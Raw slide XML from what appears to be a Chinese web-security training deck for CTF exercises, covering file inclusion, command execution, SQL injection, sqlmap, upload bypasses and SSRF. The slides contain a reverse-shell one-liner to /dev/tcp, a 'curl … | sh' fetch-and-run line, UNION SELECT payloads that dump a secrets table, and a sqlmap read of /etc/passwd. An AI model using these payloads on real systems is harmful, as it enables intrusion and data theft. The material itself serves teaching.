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3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2" name="正文级别 1…"/>
          <p:cNvSpPr txBox="1"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标题文本</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="图片占位符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正文级别 1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hyperlink" Target="http://php.net/manual/en/wrappers.php.php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矩形 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2368897" y="1484783"/>
            <a:ext cx="4298230" cy="213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13800">
                <a:ln w="18415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/>
            <a:r>
              <a:t>N S C</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4139951" y="3573016"/>
            <a:ext cx="936105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of</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="矩形 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3488410" y="4365104"/>
            <a:ext cx="1081272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>
                <a:ln w="18415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/>
            <a:r>
              <a:t>BIT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="116" name="图片 7" descr="图片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2000" y="4149080"/>
            <a:ext cx="1368152" cy="13681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6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2" name="内容占位符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3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图片 4" descr="图片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07288" y="6021287"/>
            <a:ext cx="836713" cy="836713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矩形 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="590848" y="1794480"/>
            <a:ext cx="648072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>
                <a:ln w="18415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pPr>
            <a:r>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:t>打开</a:t>
            </a:r>
            <a:r>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:t>关闭远程文件包含：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166" name="矩形 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1726976" y="2834263"/>
            <a:ext cx="6480721" cy="147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n w="13811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pPr>
            <a:r>
              <a:t>在/etc/php5/apache2/php.ini中</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:ln w="13811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pPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:ln w="13811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pPr>
            <a:r>
              <a:t>allow_url_include = ON/OFF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:ln w="13811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pPr>
            <a:r>
              <a:t>allow_url_fopen = ON/OFF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内容占位符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0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图片 4" descr="图片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07288" y="6021287"/>
            <a:ext cx="836713" cy="836713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矩形 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1411902" y="738906"/>
            <a:ext cx="648072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>
                <a:ln w="18415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pPr>
            <a:r>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:t>伪协议</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="173" name="矩形 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2105436" y="1656338"/>
            <a:ext cx="6480721" cy="379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n w="13811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pPr>
            <a:r>
              <a:t>file:// — </a:t>
            </a:r>
            <a:r>
              <a:t>访问本地文件系统</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:ln w="13811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pPr>
            <a:r>
              <a:t>http:// — </a:t>
            </a:r>
            <a:r>
              <a:t>访问 </a:t>
            </a:r>
            <a:r>
              <a:t>HTTP(s) </a:t>
            </a:r>
            <a:r>
              <a:t>网址</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:ln w="13811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pPr>
            <a:r>
              <a:t>ftp:// — </a:t>
            </a:r>
            <a:r>
              <a:t>访问 </a:t>
            </a:r>
            <a:r>
              <a:t>FTP(s) URLs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:ln w="13811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pPr>
            <a:r>
              <a:t>php:// — </a:t>
            </a:r>
            <a:r>
              <a:t>访问各个输入</a:t>
            </a:r>
            <a:r>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:t>输出流（</a:t>
            </a:r>
            <a:r>
              <a:t>I/O streams</a:t>
            </a:r>
            <a:r>
              <a:t>）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:ln w="13811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pPr>
            <a:r>
              <a:t>zlib:// — </a:t>
            </a:r>
            <a:r>
              <a:t>压缩流</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:ln w="13811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pPr>
            <a:r>
              <a:t>data:// — </a:t>
            </a:r>
            <a:r>
              <a:t>数据（</a:t>
            </a:r>
            <a:r>
              <a:t>RFC 2397</a:t>
            </a:r>
            <a:r>
              <a:t>）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:ln w="13811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pPr>
            <a:r>
              <a:t>glob:// — </a:t>
            </a:r>
            <a:r>
              <a:t>查找匹配的文件路径模式</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:ln w="13811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pPr>
            <a:r>
              <a:t>phar:// — PHP </a:t>
            </a:r>
            <a:r>
              <a:t>归档</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:ln w="13811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pPr>
            <a:r>
              <a:t>ssh2:// — Secure Shell 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:ln w="13811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pPr>
            <a:r>
              <a:t>rar:// — RAR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:ln w="13811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pPr>
            <a:r>
              <a:t>ogg:// — </a:t>
            </a:r>
            <a:r>
              <a:t>音频流</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:ln w="13811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pPr>
            <a:r>
              <a:t>expect:// — </a:t>
            </a:r>
            <a:r>
              <a:t>处理交互式的流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矩形 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2706535" y="1125616"/>
            <a:ext cx="3761741" cy="942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800">
                <a:ln w="18415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/>
            <a:r>
              <a:t>命令执行漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="177" name="矩形 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1628230" y="2744599"/>
            <a:ext cx="6480720" cy="200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buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:ln w="13811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pPr>
            <a:r>
              <a:t> 常用的命令执行的函数：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="457200" indent="0">
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:ln w="13811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pPr>
            <a:r>
              <a:t> system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="457200" indent="0">
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:ln w="13811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pPr>
            <a:r>
              <a:t> shell_exec</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="457200" indent="0">
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:ln w="13811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pPr>
            <a:r>
              <a:t> Exec</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="457200" indent="0">
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:ln w="13811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pPr>
            <a:r>
              <a:t> Pathruss</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="457200" indent="0">
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:ln w="13811">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t> eval</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="457200" indent="0">
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:ln w="13811">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t> assert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矩形 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2060030" y="2439799"/>
            <a:ext cx="6480720" cy="136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buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:ln w="13811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pPr>
            <a:r>
              <a:t> 常用的命令执行的技巧：(</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:ln w="13811">
                  <a:solidFill>
                    <a:srgbClr val="FF7F52"/>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF7F52"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ex web_rce_1 ex web_rce_2</a:t>
            </a:r>
            <a:r>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="457200" indent="0">
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:ln w="13811">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t> 连接符（ &amp;&amp; ； |）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="457200" indent="0">
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:ln w="13811">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t> 长度限制 + 特殊字符过滤 （curl 2130706433 | sh ）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="457200" indent="0">
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:ln w="13811">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>  无回显 (bash -i &gt;&amp; /dev/tcp/</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:ln w="13811">
                  <a:solidFill>
                    <a:srgbClr val="800080"/>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10.0</a:t>
            </a:r>
            <a:r>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:ln w="13811">
                  <a:solidFill>
                    <a:srgbClr val="800080"/>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0.1</a:t>
            </a:r>
            <a:r>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:ln w="13811">
                  <a:solidFill>
                    <a:srgbClr val="800080"/>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8080</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:ln w="13811">
                  <a:solidFill>
                    <a:srgbClr val="800080"/>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:t>&gt;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:ln w="13811">
                  <a:solidFill>
                    <a:srgbClr val="800080"/>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="181" name="矩形 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1331640" y="980206"/>
            <a:ext cx="648072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ln w="18415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/>
            <a:r>
              <a:t>RCE的Black magic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矩形 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2891826" y="1125616"/>
            <a:ext cx="3391159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800">
                <a:ln w="18415">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Sql injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="185" name="矩形 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1704430" y="2401699"/>
            <a:ext cx="6480720" cy="374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t>注入点判断：(</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF7E69"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ex web_sqli</a:t>
            </a:r>
            <a:r>
              <a:t>)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t>单引号无返回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t>1’  || ‘1’=‘1返回正常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t>简单测试一下服务器端过滤的字符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t>单双引号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t>/**/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t>sql语句的关键字 union/select等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t>字段猜测：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t>字段数量：1’ order by 3 #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t>字段偏移： 1’ union select 1,2,3 limit 1,1%23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矩形 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1704430" y="2147699"/>
            <a:ext cx="6480720" cy="274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t>查询基本信息 1’ union select 1,version(),user() limit 1,1%23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t>version() 函数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t>user() 函数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t>database() 函数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t>查询数据库名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t>1’ union select 1,2,schema_name from information_schema.schemata limit 1,1%23</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="189" name="矩形 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1331640" y="980207"/>
            <a:ext cx="648072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ln w="18415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/>
            <a:r>
              <a:t>手工注入的基础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矩形 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1704430" y="2147699"/>
            <a:ext cx="6480720" cy="3710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t>查询表名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t>1’ union  select 1,2,table_name from information_schema.tables where table_schema= ‘level1’ limit 1,1%23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t>查询字段名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t>1’ union select 1,2,column_name from information_schema.columns where table_name=‘secrets’ limit 1,1%23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t>查询具体内容：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t>1’ union select 1,2,hex(secret) from level1.secrets limit 1,1%23</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="193" name="矩形 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1331640" y="980207"/>
            <a:ext cx="648072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ln w="18415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/>
            <a:r>
              <a:t>手工注入的基础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矩形 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1704430" y="2147699"/>
            <a:ext cx="6480720" cy="263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t>file-read选项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t>文件读取</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2857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t>sql-shell选项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t>以友好的方式执行自定义sql语句</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2857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t>udf-inject选项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t>注入udf.so，用以执行系统命令</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2857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t>Tamper选项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t>帮助sqlmap绕过过滤</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="197" name="矩形 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1331640" y="980207"/>
            <a:ext cx="648072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ln w="18415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/>
            <a:r>
              <a:t>SQLMAP的高级使用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矩形 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1704430" y="2147699"/>
            <a:ext cx="6480720" cy="2212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t>file-read选项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t>原理上和select load_file一致，需要读权限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t>—file-read=/etc/passwd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t>sql-shell选项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t>对于mysql不太友好，并不能使用stack query（使用sq的选项是—technique=sq）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="201" name="矩形 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1331640" y="980207"/>
            <a:ext cx="648072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ln w="18415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/>
            <a:r>
              <a:t>SQLMAP的高级使用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矩形 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2706535" y="1125616"/>
            <a:ext cx="3761741" cy="942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800">
                <a:ln w="18415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/>
            <a:r>
              <a:t>文件上传漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="205" name="矩形 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1539329" y="3087499"/>
            <a:ext cx="6480721" cy="162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buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:ln w="13811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pPr>
            <a:r>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:t>无过滤直接上传</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:ln w="13811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pPr>
            <a:r>
              <a:t>  解析漏洞上传  </a:t>
            </a:r>
            <a:r>
              <a:t>1.php;1.jpg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:ln w="13811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pPr>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>%00 </a:t>
            </a:r>
            <a:r>
              <a:t>截断上传     </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:ln w="13811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pPr>
            <a:r>
              <a:t> 特殊后缀名上传    </a:t>
            </a:r>
            <a:r>
              <a:t>php php3 php5 php7 pht </a:t>
            </a:r>
            <a:r>
              <a:t>phtml asp aspx cer asa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3971"/>
            <a:ext cx="9144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矩形 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1695610" y="2461656"/>
            <a:ext cx="6083311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6000">
                <a:ln w="18415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pPr>
            <a:r>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:t>安全基础实践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矩形 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2009229" y="2973199"/>
            <a:ext cx="648072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buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:ln w="13811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pPr>
            <a:r>
              <a:t> .htaccess rewrite解析特性 (</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:ln w="13811">
                  <a:solidFill>
                    <a:srgbClr val="FF6F63"/>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF6F63"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ex web_upload_2</a:t>
            </a:r>
            <a:r>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:ln w="13811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pPr>
            <a:r>
              <a:t>  条件竞争型文件上传 (</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:ln w="13811">
                  <a:solidFill>
                    <a:srgbClr val="FF602C"/>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF602C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ex web_upload_1</a:t>
            </a:r>
            <a:r>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="209" name="矩形 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1242740" y="1551707"/>
            <a:ext cx="648072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ln w="18415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/>
            <a:r>
              <a:t>特殊文件的文件上传利用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矩形 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="979236" y="1125616"/>
            <a:ext cx="7216339" cy="942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800">
                <a:ln w="18415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/>
            <a:r>
              <a:t>服务端请求伪造（SSRF）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="213" name="矩形 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1539329" y="3087499"/>
            <a:ext cx="6480721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buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:ln w="13811">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t> IP伪造，访问未授权的资源 （127.0.0.1限制 </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:ln w="13811">
                  <a:solidFill>
                    <a:srgbClr val="FF985A"/>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF985A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ex web_ssrf</a:t>
            </a:r>
            <a:r>
              <a:t>）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:ln w="13811">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t> 任意文件读取 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:ln w="13811">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>  攻击本地存在漏洞的服务（redis漏洞）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矩形 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2663139" y="2276872"/>
            <a:ext cx="3594533" cy="96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000">
                <a:ln w="18415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/>
            <a:r>
              <a:t>Thank you</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="217" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4716015" y="3933056"/>
            <a:ext cx="266429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——  HAOZIGEGE@BIT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="218" name="图片 7" descr="图片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92280" y="3645024"/>
            <a:ext cx="980729" cy="9807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3971"/>
            <a:ext cx="9144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矩形 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1827529" y="2792095"/>
            <a:ext cx="5756912" cy="296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t>如何从一个</a:t>
            </a:r>
            <a:r>
              <a:t>pcap</a:t>
            </a:r>
            <a:r>
              <a:t>包中分析中国菜刀的流量(</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF5D2C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ex web_http</a:t>
            </a:r>
            <a:r>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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t>并通过该流量还原出中国菜刀的</a:t>
            </a:r>
            <a:r>
              <a:t>payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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t>导出中国菜刀中的压缩包</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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t>使用暴力破解工具破解该压缩包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	  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3" name="矩形 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1605951" y="1125616"/>
            <a:ext cx="5962909" cy="942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800">
                <a:ln w="18415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/>
            <a:r>
              <a:t>HTTP协议与流量分析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矩形 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1843404" y="2807970"/>
            <a:ext cx="5756912" cy="232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t>以下函数可能导致file inclusion include(),include_once(),require(),require_once()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="2857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</a:p>
          <a:p>
            <a:pPr marL="381000" indent="-38100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t>一般</a:t>
            </a:r>
            <a:r>
              <a:t>文件包含分成LFI和RFI两种模式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  <a:r>
              <a:t>	  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7" name="矩形 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1268945" y="1125616"/>
            <a:ext cx="6606441" cy="942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800">
                <a:ln w="18415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/>
            <a:r>
              <a:t>文件包含漏洞（LFI/RFI)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0" name="内容占位符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1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170" y="109220"/>
            <a:ext cx="9144001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图片 4" descr="图片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07288" y="6021287"/>
            <a:ext cx="836713" cy="836713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矩形 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1403648" y="1916832"/>
            <a:ext cx="648072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ln w="18415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/>
            <a:r>
              <a:t>本地文件包含</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134" name="矩形 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2146076" y="3165098"/>
            <a:ext cx="6480721" cy="189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n w="13811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pPr>
            <a:r>
              <a:t>1. </a:t>
            </a:r>
